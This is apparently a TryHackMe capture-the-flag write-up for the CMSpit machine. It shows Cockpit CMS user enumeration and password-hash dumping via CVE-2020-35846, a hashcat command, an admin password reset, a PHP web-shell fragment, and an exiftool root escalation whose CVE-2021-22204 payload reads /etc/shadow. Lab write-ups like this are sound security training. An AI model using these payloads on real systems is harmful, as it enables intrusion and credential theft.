TryHackMe: CMSpit


Tags: php cve ssh exiftool

Here’s my write-up for CMSpit, a CTF challenge created by stuxnet.


I deployed the machine using TryHackMe’s interface and scanned the host using nmap:

└──╼ $nmap -sV sC
Starting Nmap 7.92 ( ) at 2022-05-28 10:48 CEST
Failed to resolve "sC".
Nmap scan report for
Host is up (0.056s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

This machine had the following ports exposed:

I took a look at what was running on port 80 and was presented with a login form.

A quick review of the page source showed that this was a CMS named Cockpit, and the version running was 0.11.1

Several CVEs exist for Cockpit 0.11.1 which, when exploited, allow a malicious user to enumerate users, retrieve the hashes of user passwords, and reset user passwords.

I used this exploit to enumerate users and collect password hashes for each user.

└──╼ $python -u
[+] is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) : 

[+] Users Found : ['admin', 'darkStar7471', 'skidy', 'ekoparty']
     [*] user : admin
     [*] name : Admin
     [*] email :
     [*] active : True
     [*] group : admin
     [*] password : $2y$10$dChrF2KNbWuib/5lW1ePiegKYSxHeqWwrVC.FN5kyqhIsIdbtnOjq
     [*] i18n : en
     [*] _created : 1621655201
     [*] _modified : 1621655201
     [*] _id : 60a87ea165343539ee000300
     [*] _reset_token : rp-1de3f13392358f17cbc4eb781ebcf4fe6291e2e291041
     [*] md5email : a11eea8bf873a483db461bb169beccec
     [*] user : darkStar7471
     [*] email : darkstar7471@tryhackme.fakemail
     [*] active : True
     [*] group : admin
     [*] i18n : en
     [*] api_key : account-3bdaf7b838bd37df042918c00fb528
     [*] name : darkStar7471
     [*] password : $2y$10$uAm8IylkDFQviO/CbzP4duOqKCFCFZTiv2x7JSdm2UWyr9TJUX86e
     [*] _modified : 1621657994
     [*] _created : 1621657994
     [*] _id : 60a8898b6565354b19000323
     [*] _reset_token : rp-1ec925f72f14a77bb8ebfb935c7834226291e52a9e735
     [*] md5email : 57e606455d7cecb913cc5316d6947359
     [*] user : skidy
     [*] email : skidy@tryhackme.fakemail
     [*] active : True
     [*] group : admin
     [*] i18n : en
     [*] api_key : account-21ca3cfc400e3e565cfcb0e3f6b96d
     [*] password : $2y$10$uiZPeUQNErlnYxbI5PsnLurWgvhOCW2LbPovpL05XTWY.jCUave6S
     [*] name : Skidy
     [*] _modified : 1621719311
     [*] _created : 1621719311
     [*] _id : 60a9790f393037a2e400006a
     [*] _reset_token : rp-1e1cf190ee45f82d60c7ea1fc69962236291e535f1bd2
     [*] md5email : 5dfac21f8549f298b8ee60e4b90c0e66
     [*] user : ekoparty
     [*] email : ekoparty@tryhackme.fakemail
     [*] active : True
     [*] group : admin
     [*] i18n : en
     [*] api_key : account-c06006d6bf8227d107a500ee1625e3
     [*] password : $2y$10$Cz5whXg.dzlI4t8upxw9GulhqVbt0hNVE8trz5aB2pReye5/qW8BW
     [*] name : Ekoparty
     [*] _modified : 1621719688
     [*] _created : 1621719688
     [*] _id : 60a97a883163330a2200023e
     [*] _reset_token : rp-1c4858421435abb88ec851a3b6032d926291e53dd38e0
     [*] md5email : 199e50817a7b057867d9ce0261891304

I set up hashcat to try and crack the passwords in the background.

hashcat -m 3200 -a 0 hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt

I then reset the admin user’s password using the exploit so that I could gain access.

[+] Do you want to reset the passowrd for admin? (Y/n): y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is: 
     Username : admin 
     Password : r+C*jc6MTX

Cockpit has a pretty slick interface and comes with file management and code editing features, which allowed me to upload a custom php file that would execute shell commands.

I uploaded the following snippet to a shell.php file and navigated to /shell.php in my browser.

<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">

After a little enumeration, I came across a “stux” user.

Inside stux’s home directory was a file named “.dbshell” which contained a password.

The password found in “.dbshell” was the same password used to access stux’s account via ssh.

Linpeas reported that the stux user could run exiftool as root without a password.

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
Matching Defaults entries for stux on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User stux may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/local/bin/exiftool

I was able to get the root flag using a technique listed on GTFObins:

Although reading files via exiftool allowed me to get the root flag, it was not the intended path for this CTF.

The intended path is to exploit CVE-2021-22204.

I created a file named “exploit”, containing a command that should only be allowed to be executed by root.

(metadata "\c${system ('cat /etc/shadow')};")

As per the exploit instructions, I ran djvumake with the necessary arguments, and successfully executed a command as the root user.

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